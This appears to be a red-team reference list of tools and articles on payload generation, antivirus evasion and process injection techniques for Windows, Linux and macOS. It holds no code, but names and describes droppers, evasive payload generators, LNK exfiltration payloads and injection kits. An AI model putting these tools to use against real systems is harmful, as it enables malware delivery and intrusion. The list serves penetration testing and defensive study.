- Simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.
- [EN] Golang for pentests : Hershell
-
Go-deliver
-
HTA
-
genHTA
- Generates anti-sandbox analysis HTA files without payloads
-
morpHTA
- Morphing Cobalt Strike's evil.HTA
-
Demiguise
- The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place, and (if you use environmental keying) to avoid it being sandboxed.
-
genHTA
-
LNK Files
-
LNKUp
- Generates malicious LNK file payloads for data exfiltration
- Embedding reverse shell in .lnk file or Old horse attacks
-
LNKUp
-
MSI Binaries
-
Wix Toolkit
- Tool for crafting msi binaries
- Distribution of malicious JAR appended to MSI files signed by third parties
-
Wix Toolkit
-
.NET
-
DotNetToJScript
- A tool to create a JScript file which loads a .NET v2 assembly from memory.
- Payload Generation with CACTUSTORCH
-
DotNetToJScript
-
Powershell
- Powershell Download Cradles - Matthew Green
-
Invoke-PSImage
- Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web (when the -Web flag is passed). The least significant 4 bits of 2 color values in each pixel are used to hold the payload. Image quality will suffer as a result, but it still looks decent. The image is saved as a PNG, and can be losslessly compressed without affecting the ability to execute the payload as the data is stored in the colors themselves. It can accept most image types as input, but output will always be a PNG because it needs to be lossless. Each pixel of the image is used to hold one byte of script, so you will need an image with at least as many pixels as bytes in your script. This is fairly easy—for example, Invoke-Mimikatz fits into a 1920x1200 image.
- Reverse Encrypted (AES 256-bit) Shell over TCP - using PowerShell SecureString.
-
PowerDNS
- PowerDNS is a simple proof of concept to demonstrate the execution of PowerShell script using DNS only. PowerDNS works by splitting the PowerShell script in to chunks and serving it to the user via DNS TXT records.
-
Python
-
Pupy
- Pupy is a remote administration tool with an embeded Python interpreter, allowing its modules to load python packages from memory and transparently access remote python objects. The payload is a reflective DLL and leaves no trace on disk
-
Winpayloads
- Undetectable Windows Payload Generation with extras Running on Python2.7
-
Cloak
- Cloak generates a python payload via msfvenom and then intelligently injects it into the python script you specify.
-
Pupy
-
SCT Files
-
SCT-obfuscator
- SCT payload obfuscator. Rename variables and change harcoded char value to random one.
-
SCT-obfuscator
-
VBA
-
VBad
- VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.
-
VBad
-
C & C++
-
Anti-Virus
-
Articles/Writeups
- pecloak.py - An Experiment in AV evasion
- How to Bypass Anti-Virus to Run Mimikatz
- Practical Anti-virus Evasion - Daniel Sauder
- Why Anti-Virus Software Fails
-
Sacred Cash Cow Tipping 2017 - BlackHills Infosec
- We're going to bypass most of the major antivirus programs. Why? 1) Because it's fun. 2) Because it'll highlight some of the inherent weaknesses in our environments today.
- Sacred Cash Cow Tipping 2020 - BHIS
- Deep Dive Into Stageless Meterpreter Payloads
-
Execute ShellCode Using Python
- In this article I am going to show you, how can we use python and its "ctypes" library to execute a "calc.exe" shell code or any other shell code.
- Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus - noopy.io
- Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus (Part 2) - noopy.io
- Bypassing Kaspersky 2017 AV by XOR encoding known malware with a twist - monoc.com
- Bypassing Static Antivirus With Ten Lines of Code - Attactics
-
Tools
-
avepoc
- some pocs for antivirus evasion
-
AVSignSeek
- Tool written in python3 to determine where the AV signature is located in a binary/payload
- SpookFlare: Stay In Shadows
-
avet framework
- AVET is an AntiVirus Evasion Tool, which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. In version 1.1 lot of stuff was introduced, for a complete overview have a look at the CHANGELOG file. Now 64bit payloads can also be used, for easier usage I hacked a small build tool (avet_fabric.py).
-
Don't Kill My Cat (DKMC)
- Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool rely on PowerShell the execute the final shellcode payload.
- Presentation - Northsec2017
-
Dr0p1t-Framework
- Have you ever heard about trojan droppers ? In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)
- PowerLine
- Invoke-CradleCrafter: Moar PowerShell obFUsk8tion by Daniel Bohannon
- Invoke-CradleCrafter v1.1
-
wePWNise
- WePWNise generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software
-
katz.xml
- Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
- Shellter
-
SigThief
- Stealing Signatures and Making One Invalid Signature at a Time
-
SideStep
- SideStep is yet another tool to bypass anti-virus software. The tool generates Metasploit payloads encrypted using the CryptoPP library (license included), and uses several other techniques to evade AV.
- peCloak.py - An Experiment in AV Evasion
- Making FinFisher Undetectable
- Bypass AV through several basic/effective techniques
-
stupid_malware
- Python malware for pentesters that bypasses most antivirus (signature and heuristics) and IPS using sheer stupidity
-
InfectPE
- Using this tool you can inject x-code/shellcode into PE file. InjectPE works only with 32-bit executable files.
-
MorphAES
- IDPS & SandBox & AntiVirus STEALTH KILLER. MorphAES is the world's first polymorphic shellcode engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS, it's cross-platform as well and library-independent.
-
Inception
- Provides In-memory compilation and reflective loading of C# apps for AV evasion.
-
recomposer
- Randomly changes Win32/64 PE Files for 'safer' uploading to malware and sandbox sites.
-
Phantom-Evasion
- Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation section dedicated to persistence and auxiliary modules.
-
avepoc
-
Articles/Writeups
Stuff
-
I Swear I'll get around to this soon™, and make it actually useful/document things
-
Agnostic
- Library Injection
-
Linux
- 101
- Articles/Blogposts/Writeups
- Talks & Presentations
-
Tools
-
Jugaad - Thread Injection Kit
- Jugaad is an attempt to create CreateRemoteThread() equivalent for
*nix
platform. The current version supports only Linux operating system. For details on what is the methodology behind jugaad and how things work under the hood visit http://null.co.in/section/projects for a detailed paper.
- Jugaad is an attempt to create CreateRemoteThread() equivalent for
-
linux-injector
- Utility for injecting executable code into a running process on x86/x64 Linux. It uses ptrace() to attach to a process, then mmap()'s memory regions for the injected code, a new stack, and space for trampoline shellcode. Finally, the trampoline in the target process is used to create a new thread and execute the chosen shellcode, so the main thread is allowed to continue. This project borrows from a number of other projects and research, see References below.
-
linux-inject
- Tool for injecting a shared object into a Linux process
-
injectso64
- This is the x86-64 rewrite of Shaun Clowes' i386/SPARC injectso which he presented at Blackhat Europe 2001.
-
Jugaad - Thread Injection Kit
-
OS X
- 101
- Articles/Blogposts/Writeups
- Talks & Presentations
- Tools
-
Python
- 101
- Articles/Blogposts/Writeups
- Talks & Presentations
-
Tools
-
pyrasite
- Tools for injecting arbitrary code into running Python processes.
-
Equip: python bytecode instrumentation
- equip is a small library that helps with Python bytecode instrumentation. Its API is designed to be small and flexible to enable a wide range of possible instrumentations. The instrumentation is designed around the injection of bytecode inside the bytecode of the program to be instrumented. However, the developer does not need to know anything about the Python bytecode since the injected code is Python source.
-
pyrasite
-
Windows
-
Tools
-
InfectPE
- Using this tool you can inject x-code/shellcode into PE file. InjectPE works only with 32-bit executable files.
-
Inception Framework
- Inception provides In-memory compilation and reflective loading of C# apps for AV evasion. Payloads are AES encrypted before transmission and are decrypted in memory. The payload server ensures that payloads can only be fetched a pre-determined number of times. Once decrypted, Roslyn is used to build the C# payload in memory, which is then executed using reflection.
-
InfectPE
-
Tools
Linux Code Injection
- 101
- General Information
- Articles/Blogposts/Writeups
- Techniques
macOS Code Injection
- 101
- General Information
- Articles/Blogposts/Writeups
- Techniques
Windows Code Injection Techniques
- 101
-
3 Base Primitive Categories
- Process Spawning Techniques
- Injecting During Process Initialization
- Injecting into Running Processes
- One day I'll sort the articles/techniques into each.
-
Articles/Blogposts/Writeups that aren't about one sepcific technique
-
Windows API index - docs.ms
- The following is a list of the reference content for the Windows application programming interface (API) for desktop and server applications.
- Ten process injection techniques: A technical survey of common and trending process injection techniques - Ashkan Hosseini(2017)
- Memory Injection like a Boss - Noora Hyvärinen(2018)
- Process Injection - Part I - 3xpl01tc0d3r(2019)
- The state of advanced code injections - David Korczynski(2019)
-
Process Injection: a primer - RedCanary(2020)
- Experts from Red Canary, VMware Carbon Black, MITRE ATT&CK, and Microsoft break down the many facets of the Process Injection technique.
- Hidden in plain sight? - @casheeew(BlackHoodie2018)
- PoC Examples
-
Windows API index - docs.ms
-
Generic
* GetEnvironmentVariable as an alternative to WriteProcessMemory in process injections - x-c3ll(2020)
* Injecting Code into Windows Protected Processes using COM - Part 1 - James Forshaw(P0)
* Injecting Code into Windows Protected Processes using COM - Part 2 - James Forshaw(P0)
-
PoCs
- demos - hasherezade
-
Injectopi
- Injectopi is a set of tutorials that I've decided to write down in order to learn about various injection techniques in the Windows' environment.
- InjectProc - Process Injection Techniques
- pinjectra
-
PoCs
- CreateRemoteThread
-
APC
-
101
- Asynchronous Procedure Calls - docs.ms
- Inside NT's Asynchronous Procedure Call - Albert Almeida(2002)
- Remote Windows Kernel Exploitation Step into the Ring 0 - Barnaby Jack
- Windows Process Injection: Asynchronous Procedure Call (APC) - modexp(2019)
- APC Series: User APC API - Ori Damari(2020)
- APC Series: User APC Internals - Ori Damari(2020)
-
Informational
- Kernel to User land: APC injection - Vault7Leaks
- Examining the user-mode APC injection sensor introduced in Windows 10 build 1809 - Souhail Hammou
- Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor - Philip Tsukerman(2019)
- The Curious Case of QueueUserAPC - Dwight Hohnstein(2019)
- Process Injection - Part V - 3xpl01tc0d3r(2019)
- Userland-Specific
- Kernel-Specific
- Performing
-
Tools
- PoC
- Inject-dll-by-APC
- APC Internals Research Code
-
injdrv
- injdrv is a proof-of-concept Windows Driver for injecting DLL into user-mode processes using APC.
-
APCInjector
- Windows Kernel Driver dlls injector using APC
-
APC-PPID
- Adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread and spoof the Parent Process.
-
101
-
Atom Bombing
-
101
- AtomBombing – A New Code Injection Attack - ENISA(2016)
-
AtomBombing: Injecting Code Using Windows’ Atoms - Tal Liberman(BSidesSF(2017)
- In this talk we present a code injection technique, dubbed AtomBombing, which exploits Windows atom tables and Async Procedure Calls (APC). At the time of its release (October 2016), AtomBombing went undetected by common security solutions that focused on preventing infiltration. AtomBombing affects all Windows versions. In particular, we tested it against Windows 10 and Windows 7. Unfortunately, this issue cannot be patched by Microsoft since it doesn’t rely on broken or flawed code – rather on how these operating system mechanisms are designed.
-
Info
- Dridex’s Cold War: Enter AtomBombing - Magal Baz, Or Safran(2017)
- Detecting stealthier cross-process injection techniques with Windows Defender ATP: Process hollowing and atom bombing - MS(2017)
- AtomBombing Evasion and Detection
- Dridex’s Bag of Tricks: An Analysis of its Masquerading and Code Injection Techniques - Ratnesh Pandey(2019)
- Performing
- PoC
-
101
- Breaking BaDDEr
- 'Code-less' Injection
- Command Line and Environment Variables
- Console Window Class
- Ctrl Injection
-
DLL Injection
-
101
- Dynamic-link library
- DllMain entry point - docs.ms
- Exporting from a DLL - docs.ms
- DLL injection - Wikipedia
- A More Complete DLL Injection Solution Using CreateRemoteThread - Drew_Benton(2007)
- DLL Injection and WoW64 - corsix(2010)
- Windows DLL Injection Basics - Brad Antoniewicz(2013)
- DLL/PIC Injection on Windows from Wow64 process - modexp(2015)
-
Articles/Blogposts/Writeups
-
Informational
- Remote Thread Execution in System Process using NtCreateThreadEx for Vista & Windows7 - securityxploded
- DLL Injection and Windows 8 - nagareshwar.securityxploded(2012)
- Using SetWindowsHookEx for DLL Injection on Windows - Dejan Lukan(2013)
-
MapViewOfFile or NTmapViewOfSection ?
- "NtmapViewOfSection is a low level function in ntdll. All what MapViewOfSection does is just some small extra, like security checks, sanitizing, etc. Or it might be a simple wrapper. The point is that there isn't any special case where you should use this or that. They both do the same thing. - Unc3nZureD"
-
Performing
- Process Injection - Part II - 3xpl01tc0d3r(2019)
- Inject All the Things - Shut up and hack - deniable.org(2017)
- [DLL Injection Part 0: Understanding DLL Usage - Mark Wolters(2015(https://warroom.rsmus.com/dll-injection-part-0-understanding-dll-usage/)
- DLL Injection Part 1: SetWindowsHookEx - malarkey(2015)
- DLL Injection Part 2: CreateRemoteThread and More - malarkey(2015)
- DLL Injection - pentestlab.blog(2017)
- DLL Injection and Hooking
- Delivering custom payloads with Metasploit using DLL injection - blog.cobalstrike
- DLL Injection via a Custom .NET Garbage Collector - @spottheplanet
-
Informational
-
Tools
- DLL-Injection - mwwolters
- dll_inject_test
-
dllinjector
- dll injection tool that implements various methods
-
Bleak
- A Windows native DLL injection library that supports several methods of injection.
-
Lunar
- A lightweight native DLL mapping library that supports mapping directly from memory
-
injectAllTheThings
- Single Visual Studio project implementing multiple DLL injection techniques (actually 7 different techniques) that work both for 32 and 64 bits. Each technique has its own source code file to make it easy way to read and understand.
-
MemJect
- Simple Dll injector loading from memory. Supports PE header and entry point erasure. Written in C99.
- Windows-DLL-Injector
-
101
-
Reflective Dll Injection
-
101
- Reflection (computer programming) - Wikipedia
-
HS-P005_ReflectiveDllInjection.pdf - Stephen Fewer(2008)
- Whitepaper on reflective DLL injection. Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) loader.
-
Reflective DLL Injection - Stephen Fewer(2008)
- Alternate hosting of paper
- Loading a DLL from memory - Joachim Bauch(2010)
- Explaining Reflective DLL Injection in 2 min - by Miss Smurfette(2020)
-
Info
- Reflective DLL Injection with PowerShell - clymb3r(2013)
- Upgrade your DLL to Reflective DLL - Ionut Popescu(2015)
- An Improved Reflective DLL Injection Technique - Dan Staples(2015)
- Cross-Architecture Reflective DLL Injection - Dan Staples(2015)
- ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue(2017)
- DLL Injection - Pentestlab.blog(2017)
- Inject Dll From Memory Into A Remote Process (InjectLibraryFromMemory_HYPD - Hypodermic) - Vault7Leaks
- DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis - zerosum0x0(2017)
- Reflective DLL Injection - dtm(2017)
- sRDI – Shellcode Reflective DLL Injection - Nick Landers(2017)
-
Performing
- Portable Executable (P.E.) Code Injection: Injecting an Entire C Compiled Application - Ciro Sisman Pereira(2008)
-
Loading Win32/64 DLLs "manually" without LoadLibrary() - xenotron(2014)
- How to load DLLs by allocating memory and loading the DLL from file/memory and then relocating/importing.
- Reflective DLL Injection - @spotheplanet
- [Exploit Development 5: Reflective DLL Injection - Thomas(2017)]
-
Reflective DLLs and You - cplsec(2018)
- "This post is about reflective dynamic link libraries (DLL) and will do a simple walk-through on how to write one. This is a technique developed by Stephen Fewer and will use his code to make the magic happen. I realize this is a topic that has been discussed several times so I’m going to keep this post simple and tight."
- Windows - Process Injection Technique: Reflective DLL Injection - t0rchwo0d(2019)
-
Detection
-
Detecting Reflective Injection - Andrew King(DEFCON 20)
- This talk will focus on detecting reflective injection with some mildly humorous notes and bypassing said protections until vendors start actually working on this problem. It seems amazing that reflective injection still works. Why is that? Because programmers are lazy. They don't want to write new engines, they want to write definitions for an engine that already exists. So what do we do about it? Release a $5 tool that does what $50 AV has failed epically at for several years now...oh and it took me a week or so...Alternately, you could license it to vendors since their programmers are lazy.
- What is Reflective DLL Injection and how can be detected? - Andrea Fortuna(2017)
-
Detecting Reflective Injection - Andrew King(DEFCON 20)
- PoCs
-
Tools
-
ReflectiveDLLInjection - Stephen Fewer
- Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.
-
MemJect
- Simple Dll injector loading from memory. Supports PE header and entry point erasure. Written in C99.
-
doublepulsar-usermode-injector
- A utility to use the usermode shellcode from the DOUBLEPULSAR payload to reflectively load an arbitrary DLL into another process, for use in testing detection techniques or other security research.
-
RemoteFunctions
- LoadLibrary, GetModuleHandle and GetProcAddress calls for remote processes
-
ReflectiveDLLInjection - apriorit
- This tool demonstrates various remote dll injection methods.
-
ImprovedReflectiveDLLInjection
- An improvement of the original reflective DLL injection technique by Stephen Fewer of Harmony Security
-
injectAllTheThings
- Single Visual Studio project implementing multiple DLL injection techniques (actually 7 different techniques) that work both for 32 and 64 bits. Each technique has its own source code file to make it easy way to read and understand.
-
ReflectCmd
- A simple reflective dll example
-
Pazuzu
- Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.
-
Injectora
- x86/x64 manual mapping injector using the JUCE library
-
ReflectCmd
- A simple reflective dll example
-
MemoryModule
- MemoryModule is a library that can be used to load a DLL completely from memory - without storing on the disk first.
- Windows Manage Reflective DLL Injection Module - Metasploit
-
sRDI - Shellcode Reflective DLL Injection
- sRDI allows for the conversion of DLL files to position independent shellcode. It attempts to be a fully functional PE loader supporting proper section permissions, TLS callbacks, and sanity checks. It can be thought of as a shellcode PE loader strapped to a packed DLL.
- ReflectivePELoader - BenjaminSoelberg
-
ReflectiveDLLInjection - Stephen Fewer
-
101
- DNS Client API
- Process Doppelganging
- DoubleAgent
- Earlybird Injection
- Extra Window Bytes
- Gargoyle
-
GhostWriting Injection
-
101
-
A paradox: Writing to another process without openning it nor actually writing to it - txipi(2007)
- A paradox: Writing to another process without openning it nor actually writing to it
-
A paradox: Writing to another process without openning it nor actually writing to it - txipi(2007)
- Informational
- Performing
- PoCs
-
101
- Process Hollowing
- (Un-)Hooking
- Inject-Me
- KernelControlTable - ehhhhhhhhhhh
- KnownDLLs Cache Poisoning
- Mapping Injection
- Multiple Provider Router (MPR) DLL and Shell Notifications
-
NINA
-
101
- [NINA: x64 Process Injection (NINA: No Injection, No Allocation x64 Process Injection Technique.) - NtRaiseHardError(2020)]
-
101
- NtCreate
-
.NET/C#
-
.NET Internals and Code Injection
- This article is the obvious culmination of the previous effort of writing the Rebel.NET application and the first of a two series of articles about the .NET framework internals and the protections available for .NET assemblies. The next article will be about .NET native compiling. As the JIT inner workings haven't been analyzed yet, .NET protections are quite naļf nowadays. This situation will rapidly change as soon as the reverse engineering community will focus its attention on this technology. These two articles are aimed to raise the consiousness about the current state of .NET protections and what is possible to achieve but hasn't been done yet. In particular, the current article about .NET code injection represents, let's say, the present, whereas the next one about .NET native compiling represents the future. What I'm presenting in these two articles is new at the time I'm writing it, but I expect it to become obsolete in less than a year. Of course, this is obvious as I'm moving the first steps out from current .NET protections in the direction of better ones. But this article isn't really about protections: exploring the .NET framework internals can be useful for many purposes. So, talking about protections is just a means to an end.
-
.NET Internals and Code Injection
-
PE Injection
-
101
- PE Format - docs.ms
- PE Format notes - corkami
- Portable Executable File Format - Johannes Plachy
- CONSTANT INSECURITY: (PECOFF) Portable Executable FIle Format - Mario Vuksan, Tomislav Pericin(BHUSA2011)
- Injecting code into executables with C - Michal Strehovsky(2007)
- Portable Executable Injection For Beginners - MalwareTech(2013)
- PE injection explained - Advanced memory code injection technique - Emeric Nasi(2014)
- Some thoughts about PE Injection - Andrea Fortuna(2018)
- Code Injection - Process PE Injection Basics - Emeric Nasi(2019)
- Powershell PE Injection: This is not the Calc you are looking for! - b33f
- Info
-
Performing
- [PE Section Header Injection using Code Cave - ]
- Reflective PE Injection in Windows 10 1909 - HUBBL3
- [RedDev Series #1] PE Injection Trick - Chiam Yj(2020)
-
Detection
- See the Logging, System Monitoring and Threat Hunting Page.
-
PoCs
- PE-Inject - DelphiBasics(2010)
- PE-inject - Michal Strehovsky
-
ReflectivePELoader
- POC Reflective PE loader for DLL injection.
-
SimplePELoader
- A very simple PE loader for loading DLL's into memory without using LoadLibrary
-
Mandark
- Tiny 64-bit RunPE written in C#
-
Loader
- C# Loader with BlackBone
-
RunPE
- Code that allows running another windows PE in the same address space as the host process.
-
loadlibrayy
- x64 PE injector with kernel handle elevation and thread hijacking capabilities
- Invoke-ReflectivePEInjection - PowerSploit https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1)
- Invoke-ReflectivePEInjection.ps1 - empire](https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/management/Invoke-ReflectivePEInjection.ps1)
-
101
- PowerLoader(Ex)
- Print Spooler
- PROPagate
- Service Control Handler
- Shatter
- Shellcode Injection
-
Stack Bomber
- 101
- Info
- Performing
- Detection
-
PoC
-
Pinjectra
- Pinjectra is a C/C++ OOP-like library that implements Process Injection techniques (with focus on Windows 10 64-bit)
-
Pinjectra
-
Thread Execution Hijacking
- 101
-
Info
- Ten process injection techniques: A technical survey of common and trending process injection techniques - Ashkan Hosseini(2017)
- PE 1nj3ct10n and Thread Hijacking For Malware Analysis - Alparslan Akyıldız academy(2019)
- Dridex’s Bag of Tricks: An Analysis of its Masquerading and Code Injection Techniques - Ratnesh Pandey
- Performing
- Detection
-
PoC
- InjectThread.c
-
ThreadBoat
- Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application.
-
cThreadHijack
- Beacon Object File (BOF) for remote process injection via thread hijacking
- ThreadLocal Storage Injection
- Tooltips/Common Controls
- Windows Notification Facility
- WinSock Helper Functions(WSHX)